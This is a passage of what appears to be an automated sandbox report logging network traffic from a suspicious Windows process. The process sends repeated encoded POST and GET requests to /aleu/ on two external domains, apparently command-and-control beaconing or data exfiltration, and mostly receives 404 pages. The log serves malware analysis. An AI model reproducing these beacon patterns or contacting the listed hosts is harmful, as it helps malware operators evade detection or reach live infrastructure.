                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.1049737203.161.46.103803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:36.138067007 CEST748OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.fairmarty.top
                            Origin: http://www.fairmarty.top
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 215
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.fairmarty.top/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 5a 67 35 39 42 69 4e 48 69 71 36 55 2f 45 37 41 76 67 33 6e 43 58 69 48 48 35 53 54 79 70 73 6c 31 64 49 38 54 4e 34 4b 75 69 67 63 56 37 44 35 42 6e 59 4b 58 67 48 39 54 31 37 71 54 58 4d 52 46 65 78 2b 64 66 43 62 4c 50 5a 42 62 70 4d 7a 61 61 42 4e 71 4f 64 75 38 6f 53 42 64 6a 4b 63 62 39 52 61 74 51 4d 50 53 41 68 78 78 62 48 67 79 36 44 70 6f 4b 56 6a 74 7a 51 46 56 50 31 69 72 4d 31 61 33 72 6d 77 44 47 4c 65 54 62 30 4b 6e 51 57 34 48 2f 58 6c 58 57 30 50 76 78 55 62 73 48 79 64 56 53 4c 68 34 64 46 36 2f 32 2f 57 67 58 72 6e 70 69 42 2f 46 42 55 4f 70 4f 56 44 37 42 56 52 76 67 3d 3d
                            Data Ascii: Fb=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypsl1dI8TN4KuigcV7D5BnYKXgH9T17qTXMRFex+dfCbLPZBbpMzaaBNqOdu8oSBdjKcb9RatQMPSAhxxbHgy6DpoKVjtzQFVP1irM1a3rmwDGLeTb0KnQW4H/XlXW0PvxUbsHydVSLh4dF6/2/WgXrnpiB/FBUOpOVD7BVRvg==
                            May 14, 2024 12:52:36.320085049 CEST533INHTTP/1.1 404 Not Found
                            Date: Tue, 14 May 2024 10:52:36 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.1049738203.161.46.103803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:38.841536999 CEST1761OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.fairmarty.top
                            Origin: http://www.fairmarty.top
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 1227
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.fairmarty.top/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 5a 67 35 39 42 69 4e 48 69 71 36 55 2f 45 37 41 76 67 33 6e 43 58 69 48 48 35 53 54 79 70 6b 6c 31 76 41 38 54 75 41 4b 76 69 67 63 57 37 44 36 42 6e 5a 57 58 6d 76 35 54 31 33 63 54 56 45 52 45 38 35 2b 62 74 6d 62 41 50 5a 42 55 4a 4d 32 48 71 42 59 71 4f 4e 71 38 6f 69 42 64 6a 4b 63 62 2f 5a 61 72 43 6b 50 51 41 67 44 6d 72 48 61 34 61 44 42 6f 4c 38 65 74 7a 63 7a 55 2f 56 69 72 73 46 61 31 64 4b 77 41 6d 4c 63 57 62 31 56 6e 51 71 64 48 2f 4c 44 58 58 42 55 76 32 34 62 70 43 54 63 42 43 48 61 76 37 64 73 37 30 37 47 74 42 4b 4f 77 6d 38 62 45 67 63 71 37 36 45 38 33 41 59 44 78 64 37 67 4c 55 59 4d 72 4c 4b 6f 2b 63 77 4e 75 4d 48 55 6b 51 69 6c 6e 45 48 50 6f 36 38 6d 74 6b 50 39 62 68 2b 48 65 55 47 66 37 7a 2f 6b 44 56 50 49 36 61 51 2b 67 39 71 42 6f 7a 77 78 63 2f 53 45 45 52 35 57 70 52 44 37 58 48 48 66 50 42 44 39 44 67 6c 67 4b 5a 49 53 6b 43 38 72 4f 72 4d 33 34 76 63 6e 57 4e 36 30 62 50 62 48 4e 76 62 70 4e 2b 7a 59 66 58 58 76 33 39 57 [TRUNCATED]
                            Data Ascii: Fb=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypkl1vA8TuAKvigcW7D6BnZWXmv5T13cTVERE85+btmbAPZBUJM2HqBYqONq8oiBdjKcb/ZarCkPQAgDmrHa4aDBoL8etzczU/VirsFa1dKwAmLcWb1VnQqdH/LDXXBUv24bpCTcBCHav7ds707GtBKOwm8bEgcq76E83AYDxd7gLUYMrLKo+cwNuMHUkQilnEHPo68mtkP9bh+HeUGf7z/kDVPI6aQ+g9qBozwxc/SEER5WpRD7XHHfPBD9DglgKZISkC8rOrM34vcnWN60bPbHNvbpN+zYfXXv39W0HuKxdeg75pak3hKJFd6W3NLKTepj75Mzo5QI86G3etkTyZQJg6GljNMpjNCX171BtGPX6h6VrLL6/9RR/tSHc+YD8x5/GD4sKfhtZXlNosxfNMKXwz7W7Dctl4dlZjaAGNyF4r8WukLPT81VuENbMhzdpN8ZJATCMiUaOuen0CVm/+IXA17n2mk1/lJXtHyS+ZJwrWma61o0RroKL23QhQ01ti+O9YJX1rKVoENIHJUiDu5nl4LRlrqrILUGhz0wiL0J76mQgFZxBq6EgY68l5BbfuHQ0akU5cyveHghXwqOjNhRGEE6YETpQycaBKH2PD+Trp7t/KLjozvGrGtQdKf2mtcB6VDqqZmX2zcnpRDpBlQgout/8GnMtdCKnFPvGkpE3IyhaDUmqJIGI7CxBqYpXszU3njLLdGh7LmeipdW7xyMvhZYsFK+92E/OXW59N7mIfKOd33VbqKziJ4WzFDeVe8NY67KU0XYPWuChMJ9G+e2Sq0dzghVxHr0qpbKlZUPJGcbfm/EGPy2X0kX7Cve6eqeNheNy+EgILbTdrf/eJkk5sCkoZxQp9ivVeTWKEgA+hPbAXZtjPLJnhXSGx3z8y6uqJmRIzFX1ESvn77oLoC3solT2AZcDhruZUKKI2V+KDyWetfmDBdDgw/An7dkMImvQ5+Ew [TRUNCATED]
                            May 14, 2024 12:52:39.023329973 CEST533INHTTP/1.1 404 Not Found
                            Date: Tue, 14 May 2024 10:52:38 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.1049739203.161.46.103803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:41.548527002 CEST463OUTGET /aleu/?Fb=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpW9hrZ8kUbuN4/rBR3ZymMyy6TdBz3A==&Cvp=4jl0Z4R0O HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Host: www.fairmarty.top
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            May 14, 2024 12:52:41.729816914 CEST548INHTTP/1.1 404 Not Found
                            Date: Tue, 14 May 2024 10:52:41 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html; charset=utf-8
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.1049740162.240.81.18803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:56.619450092 CEST736OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.aprovapapafox.com
                            Origin: http://www.aprovapapafox.com
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 191
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.aprovapapafox.com/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 7a 6e 76 4b 34 55 6f 6d 4c 2f 51 2b 52 45 32 39 36 4c 31 75 7a 62 34 4b 58 6e 6e 51 59 62 36 38 68 63 76 46 57 71 64 4e 35 67 45 46 31 37 37 38 51 6f 45 4d 6b 55 47 4e 4e 4e 56 6e 41 6a 43 5a 7a 2b 37 6c 70 6b 72 31 57 49 52 72 41 69 75 61 78 4e 39 48 69 4e 57 52 57 68 37 6d 46 59 6a 6b 46 31 74 2f 76 61 39 4e 30 49 4c 64 76 67 7a 6e 7a 67 6a 4f 2b 77 38 49 70 48 72 53 71 2f 50 4a 70 49 59 49 4e 47 41 4e 4a 51 53 66 74 53 52 44 79 2f 4e 33 4e 44 51 79 76 41 47 6b 76 57 33 79 78 4e 43 46 75 33 54 65 72 6b 4c 46 55 4a 61 32
                            Data Ascii: Fb=rGJQ2I+FOOukznvK4UomL/Q+RE296L1uzb4KXnnQYb68hcvFWqdN5gEF1778QoEMkUGNNNVnAjCZz+7lpkr1WIRrAiuaxN9HiNWRWh7mFYjkF1t/va9N0ILdvgznzgjO+w8IpHrSq/PJpIYINGANJQSftSRDy/N3NDQyvAGkvW3yxNCFu3TerkLFUJa2
                            May 14, 2024 12:52:56.806896925 CEST1289INHTTP/1.1 404 Not Found
                            Server: nginx/1.20.1
                            Date: Tue, 14 May 2024 10:52:56 GMT
                            Content-Type: text/html
                            Content-Length: 3650
                            Connection: close
                            ETag: "636d2d22-e42"
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                            May 14, 2024 12:52:56.806910992 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                            Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                            May 14, 2024 12:52:56.806927919 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                            Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.1049741162.240.81.18803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:59.340507984 CEST760OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.aprovapapafox.com
                            Origin: http://www.aprovapapafox.com
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 215
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.aprovapapafox.com/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 79 45 6e 4b 35 32 41 6d 63 50 51 39 4e 55 32 39 77 72 31 69 7a 62 30 4b 58 6c 4c 41 59 70 65 38 6d 34 72 46 45 75 70 4e 2b 67 45 46 68 4c 37 44 55 6f 45 4c 6b 55 4b 46 4e 4d 5a 6e 41 6a 6d 5a 7a 36 2f 6c 70 54 66 32 51 59 52 31 49 43 75 55 38 74 39 48 69 4e 57 52 57 67 66 4d 46 62 54 6b 43 45 64 2f 75 37 39 4d 31 49 4c 43 75 67 7a 6e 6c 51 6a 4b 2b 77 38 75 70 44 4c 30 71 35 44 4a 70 4a 6f 49 4e 53 30 4b 44 51 53 5a 67 79 51 4b 79 50 34 53 45 57 34 7a 6d 43 71 59 34 55 6d 4c 32 73 6a 43 2f 6d 79 4a 34 54 58 4c 61 50 76 63 42 79 62 4f 72 5a 54 34 61 4b 7a 59 53 39 71 46 64 4c 4c 69 55 41 3d 3d
                            Data Ascii: Fb=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpe8m4rFEupN+gEFhL7DUoELkUKFNMZnAjmZz6/lpTf2QYR1ICuU8t9HiNWRWgfMFbTkCEd/u79M1ILCugznlQjK+w8upDL0q5DJpJoINS0KDQSZgyQKyP4SEW4zmCqY4UmL2sjC/myJ4TXLaPvcBybOrZT4aKzYS9qFdLLiUA==
                            May 14, 2024 12:52:59.527796030 CEST1289INHTTP/1.1 404 Not Found
                            Server: nginx/1.20.1
                            Date: Tue, 14 May 2024 10:52:59 GMT
                            Content-Type: text/html
                            Content-Length: 3650
                            Connection: close
                            ETag: "636d2d22-e42"
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                            May 14, 2024 12:52:59.527811050 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                            Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                            May 14, 2024 12:52:59.527827978 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                            Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.1049742162.240.81.18803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:02.062321901 CEST1773OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.aprovapapafox.com
                            Origin: http://www.aprovapapafox.com
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 1227
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.aprovapapafox.com/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
